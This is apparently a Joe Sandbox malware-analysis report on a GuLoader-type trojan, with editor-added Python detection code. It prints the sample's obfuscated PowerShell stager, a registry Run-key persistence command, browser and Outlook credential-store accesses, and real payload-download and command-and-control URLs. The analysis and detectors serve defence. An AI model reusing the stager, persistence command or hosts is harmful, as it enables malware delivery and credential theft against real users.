Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "hakkebrttet" /t reg_expand_sz /d "%elaf% -windowstyle minimized $ultramicrotome=(get-itemproperty -path 'hkcu:\noncoherent\').skvadredes;%elaf% ($ultramicrotome)"
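Two of the command lines above carry the whole loader logic and are the ones worth turning into detections. The PowerShell stager reads a dropped file, takes a three-character substring of it at a fixed offset and invokes that substring as a command with the entire file content as its argument, so the interpreter name never appears in the command line. The persistence step writes a Run-key value of type REG_EXPAND_SZ whose command begins with %elaf%, an environment variable that is only expanded at logon, and whose script body is read back out of a registry property under HKCU:\noncoherent. The triage parser below is an added example by the editor, not part of the Joe Sandbox report: the two sample command lines are copied from the rows above, while the regular expressions, rule names and the returned fields are the editor's assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Sample 1, copied from the report: Get-Content + SubString + dot-invoke stager.
SAMPLE_STAGER = r'''"powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"'''

# Sample 2, copied from the report: Run-key persistence through an
# environment-variable launcher that is expanded at logon.
SAMPLE_PERSIST = r'''"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"'''

# Regexes are the editor's assumptions, tuned to the two command lines above.
GET_CONTENT_RE = re.compile(r"Get-Content\s+'(?P<path>[^']+)'", re.I)
SUBSTRING_RE = re.compile(r"\.SubString\((?P<off>\d+)\s*,\s*(?P<len>\d+)\)", re.I)
# ".$Var($Other)" invokes the string held in $Var as a command.
DOT_INVOKE_RE = re.compile(r"\.\$(?P<cmd>\w+)\s*\(\$(?P<arg>\w+)\)")
REG_ADD_RE = re.compile(
    r'\breg(?:\.exe)?\s+add\s+(?P<key>\S+)\s.*?/v\s+"?(?P<name>[^"\s]+)"?'
    r'.*?/t\s+(?P<type>REG_\w+)\s+/d\s+"(?P<data>.*)"\s*$',
    re.I | re.S,
)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.I)
ENV_LAUNCHER_RE = re.compile(r"^%(?P<var>\w+)%")


@dataclass
class Finding:
    rule: str
    details: Dict[str, object] = field(default_factory=dict)


def triage_command_line(cmdline: str) -> List[Finding]:
    """Return the findings that fire on one process-creation command line."""
    findings: List[Finding] = []

    gc = GET_CONTENT_RE.search(cmdline)
    ss = SUBSTRING_RE.search(cmdline)
    inv = DOT_INVOKE_RE.search(cmdline)
    if gc and ss and inv:
        findings.append(Finding("powershell_substring_command_invoke", {
            "script_path": gc["path"],
            "offset": int(ss["off"]),      # where the command name sits in the file
            "length": int(ss["len"]),      # how many characters are taken from it
            "command_var": inv["cmd"],
            "argument_var": inv["arg"],
        }))

    ra = REG_ADD_RE.search(cmdline)
    if ra and RUN_KEY_RE.search(ra["key"]):
        env = ENV_LAUNCHER_RE.match(ra["data"])
        findings.append(Finding("runkey_persistence_via_reg", {
            "key": ra["key"],
            "value_name": ra["name"],
            "value_type": ra["type"].upper(),
            # REG_EXPAND_SZ plus a leading %VAR% means the real launcher is
            # whatever VAR holds at logon, not what is visible here.
            "launcher_env_var": env["var"] if env else None,
            "payload_from_registry": "get-itemproperty" in ra["data"].lower(),
        }))
    return findings


if __name__ == "__main__":
    for line in (SAMPLE_STAGER, SAMPLE_PERSIST):
        for f in triage_command_line(line):
            print(f.rule, f.details)
```

On a live host the "offset" and "length" fields tell the responder exactly which bytes of the dropped file to read to learn the command being invoked, and "launcher_env_var" tells them which user environment variable to dump alongside the Run key.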
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | Code function: 0_2_6EAC1096 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,lstrcmpiA,lstrcmpiA,DeleteFileA,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,RpcServerRegisterIf3,CreateProcessA,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalFree,GetTickCount,WaitForSingleObject,GetExitCodeProcess,RpcServerRegisterIf3,PeekNamedPipe,GetTickCount,ReadFile,lstrcpyA,GlobalReAlloc,lstrcpyA,GetTickCount,TerminateProcess,lstrcpyA,Sleep
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Manager
Source: rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000002.2615580282.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000D.00000000.2082661042.0000000000D40000.00000002.00000001.00040000.00000000.sdmp, rmGjiHyfWQcajCGtrYkAoHJJOdK.exe, 0000000F.00000000.2234046773.0000000001950000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | Code function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

Stealing of Sensitive Information

Source: Yara match | File source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\cmd.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
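The file and registry opens above are the injected cmd.exe reaching into the Chrome and Edge credential, cookie and key-material stores (Login Data, Web Data, Cookies, Local State) and into the Outlook profile hive, which is the evidence behind the "harvest and steal browser information" and "steal Mail credentials" verdicts. The reusable detection is not the path list itself but the rule that a credential store may be opened by its owning application and by nothing else. The Python below is an added example by the editor, not Joe Sandbox code: the cmd.exe rows are transcribed from the report, the chrome.exe row is a constructed negative case, and the pattern list and owner mapping are the editor's assumptions to be extended with the browsers and mail clients present in a given estate.

```python
import fnmatch
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Credential stores and the process images that legitimately open them.
# Editor's assumptions; "*" in fnmatch matches across backslashes, so
# "User Data\*\Cookies" covers both "Default\Cookies" and "Default\Network\Cookies".
CREDENTIAL_STORES: Dict[str, Set[str]] = {
    r"*\Google\Chrome\User Data\*\Login Data": {"chrome.exe"},
    r"*\Google\Chrome\User Data\*\Web Data": {"chrome.exe"},
    r"*\Google\Chrome\User Data\*\Cookies": {"chrome.exe"},
    r"*\Google\Chrome\User Data\*\Local State": {"chrome.exe"},
    r"*\Microsoft\Edge\User Data\*\Login Data": {"msedge.exe"},
    r"*\Microsoft\Edge\User Data\*\Cookies": {"msedge.exe"},
    r"*\Microsoft\Edge\User Data\*\Local State": {"msedge.exe"},
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\*": {"outlook.exe"},
}


@dataclass(frozen=True)
class AccessEvent:
    process: str  # image name of the process performing the open
    path: str     # file path or registry key


# cmd.exe rows transcribed from the report; the chrome.exe row is constructed
# to show that the owner opening its own store is not flagged.
EVENTS = [
    AccessEvent("cmd.exe", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    AccessEvent("cmd.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State"),
    AccessEvent("cmd.exe", r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"),
    AccessEvent("cmd.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies"),
    AccessEvent("cmd.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    AccessEvent("cmd.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State"),
    AccessEvent("cmd.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data"),
    AccessEvent("cmd.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    AccessEvent("cmd.exe", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\"),
    AccessEvent("chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]


def match_store(path: str) -> Optional[Tuple[str, Set[str]]]:
    """Return (pattern, owners) for the first credential-store pattern the path
    matches, or None. NTFS and the registry are case-insensitive, so both
    sides are lower-cased before matching."""
    lowered = path.lower()
    for pattern, owners in CREDENTIAL_STORES.items():
        if fnmatch.fnmatchcase(lowered, pattern.lower()):
            return pattern, owners
    return None


def find_foreign_access(events: List[AccessEvent]) -> List[Tuple[str, str, str]]:
    """Flag every open of a credential store by a process that is not its owner."""
    hits = []
    for ev in events:
        matched = match_store(ev.path)
        if matched is None:
            continue
        pattern, owners = matched
        if ev.process.lower() not in owners:
            hits.append((ev.process, ev.path, pattern))
    return hits


def summarize(hits: List[Tuple[str, str, str]]) -> Dict[str, int]:
    """Count flagged opens per process. One non-browser process touching several
    stores in a short window is the shape worth alerting on; a single hit may be
    a backup agent or a legitimate migration tool."""
    return dict(Counter(proc for proc, _, _ in hits))


if __name__ == "__main__":
    for proc, path, pattern in find_foreign_access(EVENTS):
        print(f"{proc} opened {path}  [matched {pattern}]")
    print(summarize(find_foreign_access(EVENTS)))
```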

Remote Access Functionality

Source: Yara match | File source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
ATT&CK Matrix (one row per grid row of the report's matrix; the number in parentheses is the count shown next to the technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (1) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | Deobfuscate/Decode Files or Information (11) | OS Credential Dumping (1) | File and Directory Discovery (3) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
Credentials | Domains | Default Accounts | Shared Modules (1) | Registry Run Keys / Startup Folder (1) | DLL Side-Loading (1) | Abuse Elevation Control Mechanism (1) | LSASS Memory | System Information Discovery (15) | Remote Desktop Protocol | Data from Local System (1) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (11) | Logon Script (Windows) | Access Token Manipulation (1) | Obfuscated Files or Information (3) | Security Account Manager | Security Software Discovery (121) | SMB/Windows Admin Shares | Email Collection (1) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | PowerShell (2) | Login Hook | Process Injection (512) | Software Packing (1) | NTDS | Process Discovery (2) | Distributed Component Object Model | Clipboard Data (1) | Application Layer Protocol (5) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Registry Run Keys / Startup Folder (1) | DLL Side-Loading (1) | LSA Secrets | Virtualization/Sandbox Evasion (31) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading (11) | Cached Domain Credentials | Application Window Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Modify Registry (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (31) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (512) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

Behavior Graph ID: 1431789
Sample: SecuriteInfo.com.Win32.Malw...
Start date: 25/04/2024
Architecture: WINDOWS
Score: 100

Sample-level network: www.n-benriya002.com; www.ejbodyart.com; 4 other IPs or domains
Sample-level signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures

Process tree (from the behavior graph):
SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe (started)
    Dropped: C:\Users\user\AppData\Local\...\nsExec.dll (PE32); C:\Users\user\...\Afvrgningernes.Ign37 (ASCII)
    Signatures: Suspicious powershell command line found
    powershell.exe (started)
        Dropped: C:\Users\user\AppData\...\Overfondle.exe (PE32)
        Signatures: Obfuscated command line found; Writes to foreign memory regions; Sample uses process hollowing technique; 2 other signatures
        Overfondle.exe (started)
            Network: kraljevikonaci.rs 195.252.110.253, ports 443, 49706, BEOTEL-AShttpwwwbeotelnetRS, Serbia
            Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Maps a DLL or memory area into another process
            rmGjiHyfWQcajCGtrYkAoHJJOdK.exe (injected)
                Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                cmd.exe (started)
                    Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
                    rmGjiHyfWQcajCGtrYkAoHJJOdK.exe (injected)
                        Network: n-benriya002.com 219.94.128.41, ports 49712, 80, SAKURA-CSAKURAInternetIncJP, Japan; www.jt-berger.store 217.160.0.183, ports 49708, 49709, 49710, ONEANDONE-ASBrauerstrasse48DE, Germany; ejbodyart.com 112.175.50.218, ports 49707, 80, KIXS-AS-KRKoreaTelecomKR, Korea Republic of
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    firefox.exe (started)
            cmd.exe (started)
                conhost.exe (started)
                reg.exe (started)
        conhost.exe (started)
        cmd.exe (started)

Source | Detection | Scanner | Label
SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | 50% | ReversingLabs | Win32.Trojan.GuLoader
SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | 58% | Virustotal |
SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Overfondle.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Overfondle.exe | 50% | ReversingLabs | Win32.Trojan.GuLoader
C:\Users\user\AppData\Local\Temp\Overfondle.exe | 61% | Virustotal |
C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll | 0% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
ejbodyart.com | 1% | Virustotal |
n-benriya002.com | 3% | Virustotal |
www.jt-berger.store | 2% | Virustotal |
kraljevikonaci.rs | 15% | Virustotal |
www.ejbodyart.com | 0% | Virustotal |
www.n-benriya002.com | 3% | Virustotal |

Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://kraljevikonaci.rs/ | 100% | Avira URL Cloud | malware
http://www.jt-berger.store/9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N1 | 0% | Avira URL Cloud | safe
https://kraljevikonaci.rs/ETfFmOW246.bin | 100% | Avira URL Cloud | malware
https://kraljevikonaci.rs/ETfFmOW246.bin5? | 100% | Avira URL Cloud | malware
http://www.jt-berger.store/9pdo/ | 0% | Avira URL Cloud | safe
http://www.ftp.ftp://ftp.gopher. | 0% | Avira URL Cloud | safe
http://www.n-benriya002.com/9pdo/ | 0% | Avira URL Cloud | safe
http://www.n-benriya002.com | 0% | Avira URL Cloud | safe
https://kraljevikonaci.rs/ | 4% | Virustotal |
https://kraljevikonaci.rs/ETfFmOW246.binY | 100% | Avira URL Cloud | malware
http://www.n-benriya002.com/9pdo/ | 2% | Virustotal |
http://www.ejbodyart.com/9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N1 | 0% | Avira URL Cloud | safe
https://kraljevikonaci.rs/ETfFmOW246.bin | 15% | Virustotal |
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Avira URL Cloud | safe
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Avira URL Cloud | safe
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 0% | Avira URL Cloud | safe
https://kraljevikonaci.rs/ETfFmOW246.bins | 100% | Avira URL Cloud | malware
http://www.jt-berger.store/9pdo/ | 2% | Virustotal |
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Virustotal |
http://www.n-benriya002.com | 3% | Virustotal |
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | 0% | Virustotal |
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ejbodyart.com | 112.175.50.218 | true | false | | unknown
n-benriya002.com | 219.94.128.41 | true | false | | unknown
www.jt-berger.store | 217.160.0.183 | true | false | | unknown
kraljevikonaci.rs | 195.252.110.253 | true | false | | unknown
www.ejbodyart.com | unknown | unknown | true | | unknown
www.n-benriya002.com | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://www.jt-berger.store/9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N1 | false | Avira URL Cloud: safe | unknown
https://kraljevikonaci.rs/ETfFmOW246.bin | false | Virustotal: 15%; Avira URL Cloud: malware | unknown
http://www.jt-berger.store/9pdo/ | false | Virustotal: 2%; Avira URL Cloud: safe | unknown
http://www.n-benriya002.com/9pdo/ | false | Virustotal: 2%; Avira URL Cloud: safe | unknown
http://www.ejbodyart.com/9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N1 | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2068087769.00000000062EC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | cmd.exe, 0000000E.00000003.2352916614.0000000007A68000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2064998955.00000000053D6000.00000004.00000800.00020000.00000000.sdmp | false | | high
